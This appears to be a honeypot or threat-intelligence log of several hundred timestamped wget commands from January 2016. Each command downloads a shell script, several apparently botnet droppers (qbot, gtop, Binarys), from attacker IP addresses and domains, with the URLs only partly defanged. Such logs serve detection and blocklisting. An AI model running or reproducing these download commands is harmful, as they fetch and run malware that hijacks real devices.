2016-01-21 03:22:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 02:10:30 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-20 23:57:05 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-20 22:32:51 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 21:56:08 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 21:49:01 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 21:38:36 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 21:07:50 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 20:33:28 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 17:10:47 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 16:13:02 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 10:49:05 | wget hxxp:// 198.23.238.251/gb . sh
2016-01-20 09:41:22 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 09:34:12 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 07:07:37 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 06:51:52 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 06:41:03 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 06:01:47 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 05:46:11 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 05:14:29 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 05:13:02 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 05:02:00 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 04:11:57 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 03:57:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 03:13:32 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 03:05:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 02:27:34 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 02:19:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 01:42:34 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 01:27:42 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 01:14:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 00:35:57 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 00:24:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 23:58:11 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-19 23:19:08 | wget 192.227.170.67/bins . sh
2016-01-19 22:04:11 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 22:01:31 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-19 21:44:34 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 21:21:10 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 21:04:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 20:13:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 16:09:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 15:21:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 15:12:13 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-19 15:12:13 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-19 14:56:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 14:11:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 08:30:58 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 07:58:19 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 04:32:58 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:52:38 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:37:52 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:09:10 | wget hxxp:// 158.69.217.211/gb . sh
2016-01-19 02:03:04 | wget hxxp:// 158.69.217.211/gb . sh
2016-01-18 22:37:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 22:31:33 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 21:48:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 19:16:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 19:09:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:33:30 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:26:36 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 18:25:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:08:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 17:47:42 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 17:35:26 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 16:14:46 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 15:50:46 | wget hxxp:// www.hongcherng.com/rd/rd . sh-O /tmp/ich . sh
2016-01-18 15:08:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 14:59:57 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 14:24:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 05:23:27 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 04:21:59 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 03:31:26 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-18 02:47:49 | wget hxxp:// binarys.x10.mx/king/Binarys . sh
2016-01-18 02:31:48 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 02:23:52 | wget hxxp:// binarys.x10.mx/king/Binarys . sh
2016-01-18 02:21:28 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-18 02:15:19 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 01:32:08 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-18 01:31:53 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-18 01:07:15 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 23:48:52 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 22:39:13 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-17 22:30:53 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-17 21:35:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 21:21:12 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 21:08:24 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 20:18:45 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 19:45:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 18:54:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 18:13:59 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 17:57:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 17:03:06 | wget hxxp:// 94.102.49.197/gb-wget . sh
2016-01-17 09:51:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 09:15:53 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 08:37:10 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 06:42:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 05:59:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 01:47:52 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-17 00:39:05 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-16 23:41:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 23:13:19 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 23:09:42 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 22:54:36 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 22:49:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 22:23:13 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 22:15:45 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 20:16:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 20:09:38 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 18:43:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 18:33:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 18:07:11 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 17:46:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 17:37:08 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 08:12:22 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-16 02:50:01 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 23:06:34 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 22:37:03 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 22:32:13 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 22:20:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 21:02:27 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-15 19:44:51 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-15 19:14:54 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 18:26:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 17:31:26 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 17:17:24 | wget hxxp:// www.hongcherng.com/rd/rd . sh-O /tmp/ich . sh
2016-01-15 16:43:10 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 15:26:25 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-15 14:13:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 14:03:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 12:40:26 | wget -q hxxp:// 162.208.8.203/p . sh
2016-01-15 07:31:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 07:21:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 07:14:50 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 06:44:14 | wget hxxp:// 216.158.225.7/gtop . sh
2016-01-15 02:38:27 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 02:36:06 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 02:22:57 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 00:27:16 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-15 00:12:57 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:45:16 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:03:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 21:53:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 21:39:11 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 20:55:24 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 20:26:48 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 17:59:24 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-14 17:45:01 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 17:03:32 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 15:24:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 15:14:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 15:01:20 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 14:45:57 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 14:15:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 14:05:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 13:54:38 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 13:43:29 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 10:37:24 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-14 10:37:22 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-14 08:54:03 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-14 00:52:25 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 00:05:18 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-13 22:22:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 22:12:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 21:44:02 | wget ftx://79.143.181.158/gtop . sh
2016-01-13 21:19:52 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 21:16:50 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-13 19:46:09 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 16:48:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 16:38:50 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 15:05:41 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-13 14:31:12 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 14:16:54 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 14:10:12 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 14:09:33 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 13:23:35 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 13:23:33 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 13:18:01 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-13 12:40:02 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 12:39:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 10:35:24 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 08:02:52 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 07:21:22 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 07:03:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 06:05:58 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 02:46:30 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-13 02:26:53 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 02:11:42 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 01:20:37 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-13 01:17:04 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 00:35:44 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-13 00:27:29 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-12 23:46:54 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-12 21:44:13 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-12 20:25:49 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-12 16:53:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 16:43:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 11:30:47 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:22:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 08:50:05 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 07:53:17 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 05:53:28 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-12 04:49:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 04:40:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 04:31:34 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 03:29:42 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 02:14:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-12 02:14:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-12 01:45:01 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-11 23:11:53 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 23:02:44 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:36:13 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-11 22:32:27 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:32:27 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 21:48:15 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:25:01 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:21:29 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-11 19:17:44 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-11 18:46:32 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 17:40:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 14:26:05 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-11 14:11:40 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 14:11:40 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:59:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 13:54:43 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:54:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:49:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 13:44:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:44:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 12:25:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 12:15:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 08:38:34 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:28:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:22:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-11 08:22:57 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-11 08:11:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:32:20 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 06:43:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:57:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:49:38 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:42:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:42:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:34:05 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-11 00:28:19 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:28:19 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:13:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:04:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 23:18:31 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-10 23:16:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 23:06:26 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 19:55:46 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:51:09 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:46:55 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 19:23:48 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:23:10 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 19:23:10 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 19:16:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 19:07:02 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:48:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:47:19 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 17:35:23 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 17:31:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:24:01 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:09:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:09:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 16:42:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 16:32:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 15:07:41 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 12:18:23 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 07:36:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 05:19:50 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 05:18:36 | wget -q hxxp:// 208.67.1.165/DOGDICKS/Binarys . sh
2016-01-10 04:43:01 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 03:24:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 03:14:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 02:43:30 | wget hxxp:// 218.104.49.211/r3//rd . sh-O /tmp/.lm . sh
2016-01-10 02:34:43 | wget wget hxxp:// 218.104.49.211/r3//rd . sh-O /tmp/.lm . sh
2016-01-10 02:15:50 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-10 02:13:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 02:04:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:48:43 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:39:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:16:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:07:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:42:47 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:40:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:31:26 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 00:30:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:15:46 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:05:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:05:40 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:02:25 | wget hxxp:// 94.102.63.136/bin . sh
2016-01-09 23:56:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 23:20:55 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 22:43:46 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-09 22:26:27 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 22:03:05 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 21:18:34 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:59:54 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:58:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:57:46 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:48:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:48:28 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:40:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:40:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:24:46 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:24:36 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:24:36 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:11:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:08:49 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:07:05 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 20:01:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 17:16:47 | wget ftx://51.254.238.19/gb . sh
2016-01-09 14:22:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 14:12:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 13:25:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 13:15:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 09:53:33 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 09:42:53 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-09 09:42:51 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-09 09:35:50 | wget hxxp:// 158.69.205.212/getbinaries . sh
2016-01-09 08:27:57 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 07:56:56 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 07:48:27 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 06:20:33 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 05:49:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 05:39:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 05:14:00 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 05:02:32 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:52:29 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:43:25 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 04:40:06 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:30:04 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:07:08 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 04:05:31 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:44:26 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:40:26 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:27:09 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:27:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:15:18 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:05:34 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 02:57:44 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 02:57:14 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 02:55:39 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 02:44:07 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 01:54:55 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:45:07 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 01:23:34 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:13:37 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:03:32 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 01:02:08 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:55:33 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:55:33 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:51:33 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:41:31 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:41:29 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:41:29 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:27:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 00:26:46 | wget hxxp:// 31.14.136.142/bins . sh
2016-01-09 00:18:20 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:08:27 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
